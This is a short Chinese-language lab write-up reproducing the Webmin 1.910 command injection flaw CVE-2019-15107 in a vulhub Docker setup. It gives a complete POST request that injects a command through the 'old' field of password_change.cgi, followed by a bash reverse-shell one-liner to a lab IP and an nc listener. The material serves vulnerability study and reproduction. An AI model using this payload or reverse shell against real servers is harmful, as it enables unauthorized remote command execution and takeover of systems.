Webmin 远程命令执行漏洞_CVE-2019-15107

Webmin 远程命令执行漏洞_CVE-2019-15107

在线漏洞详情：

https://vulhub.org/#/environments/webmin/CVE-2019-15107/

漏洞描述：

版本影响：

​ Webmin 1.910

环境搭建

cd ~/vulhub/webmin/CVE-2019-15107

环境启动：

sudo docker-compose up -d  # 下载拉取环境

sudo docker ps -a  # 查看下载拉取的文件

已启动：访问端口10000

漏洞复现

访问https://192.168.225.166:10000/

使用BP进行抓包

POC

POST /password_change.cgi

发送以下POST请求来执行命令id:

POST /password_change.cgi HTTP/1.1
Host: your-ip:10000
Accept-Encoding: gzip, deflate
Accept: */*
Accept-Language: en
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)
Connection: close
Cookie: redirect=1; testing=1; sid=x; sessiontest=1
Referer: https://your-ip:10000/session_login.cgi
Content-Type: application/x-www-form-urlencoded
Content-Length: 60

user=rootxx&pam=&expired=2&old=test|id&new1=test2&new2=test2

复现成功

漏洞利用-shell反弹

执行反弹指令

bash -c "bash -i &> /dev/tcp/192.168.225.166/6666 0<&1" 

nc  -lvp  6666 

bp的id替换成url编码反弹shell脚本

成功反弹